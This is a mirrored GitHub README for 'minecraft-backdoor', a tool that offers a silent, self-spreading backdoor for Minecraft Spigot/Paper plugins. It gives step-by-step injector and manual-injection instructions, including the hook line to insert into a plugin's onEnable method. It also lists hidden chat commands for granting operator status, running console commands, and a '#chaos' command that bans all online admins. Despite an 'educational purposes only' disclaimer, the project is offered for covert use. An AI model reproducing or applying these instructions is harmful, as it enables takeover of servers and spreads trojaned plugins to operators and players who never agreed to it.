Coder Social home page Coder Social logo

gatekeeper1122 / minecraft-backdoor Goto Github PK

View Code? Open in Web Editor NEW

This project forked from altqc/minecraft-backdoor

0.0 0.0 0.0 169 KB

Invisible, customizable backdoor for Minecraft Spigot Plugins.

License: GNU General Public License v3.0

Java 100.00%

minecraft-backdoor's Introduction

Thicc Industries' Minecraft Backdoor

For issues with the experimental plugin injection spreading feature, please add to Issue #40

A silent, spreading backdoor for Minecraft Bukkit/Spigot/Paper servers. Using the injector is recommended, should you choose to manually backdoor a plugin, you're on your own if you run into problems.

For educational purposes only. Do not use on a server you do not own.

Requirements:

Injector:

  • Java 8 runtime.
  • Desired target plugin jar file.
  • Your Minecraft UUID. (You can find your UUID at: NameMC)

Manual Injection:

  • Java 8 JDK.
  • Desired plugin source code.
  • Plugin dependencies.
  • Your Minecraft UUID. (You can find your UUID at: NameMC)

Usage instructions:

Injector:

  • Run backdoor-(version).jar.
  • Select desired plugin file.
  • Input your Minecraft UUID.
  • Input chat command prefix. (Default: #)

Manual Injection:

  • Download source code for desired plugin, and open in editor of your choice.
  • Merge com.thiccindustries.debugger folder into the plugin's source.
  • Open the Plugin's main source file, The file's class definition should look like this: public class Something extends JavaPlugin{}
  • Add the following line to the top of the file: import com.thiccindustries.debugger
  • Find the @Override public void onEnable(){} method.
  • Add the following line to the beginning of the method: new Backdoor(this, new String[]{"[Your UUID Here]"}, [Your Chat Prefix Here]);

Note: Add multiple UUIDs by separating multiple "[uuid]" entries by commas.

  • Change other configuration options in Config.java as desired.
  • Compile plugin.

Commands

Default command prefix is #, this can be changed.

  • #op - Give player operator status
  • #deop - Remove player's operator status
  • #ban - Ban player
  • #banip - IP ban player
  • #gamemode / gm - Change gamemode
  • #give - Give items
  • #32k - Enchant item in hand with level 32k enchants.
  • #exec - Execute a command as the server console. [Visible]
  • #chaos - Deop and Ban all ops currently online. Give admin to everyone else. [Visible]
  • #seed - Find world seed
  • #coords - Find player coordinates
  • #tp - Teleport to coordinates [Visible, See below.]
  • #auth - authorize new user
  • #deauth - deauthorize user
  • #help - List all available commands, with syntax and description.

Commands listed as [Visible] will be noticeable in Server console and or in-game chat.

Warning: Teleporting may cause a '[player name] moved to quickly!' warning in server console. It may also cause anti-cheat to kick you. Other strange behavior may occur when teleporting extreme distances. (such as to the world border)

License

This software is provided under the GPL3 License.

Credit to Rikonardo for his Bukloit project, which helped in the development of the Injector.

minecraft-backdoor's People

Contributors

majesticwaffle avatar perchunpak avatar mmvanheusden avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.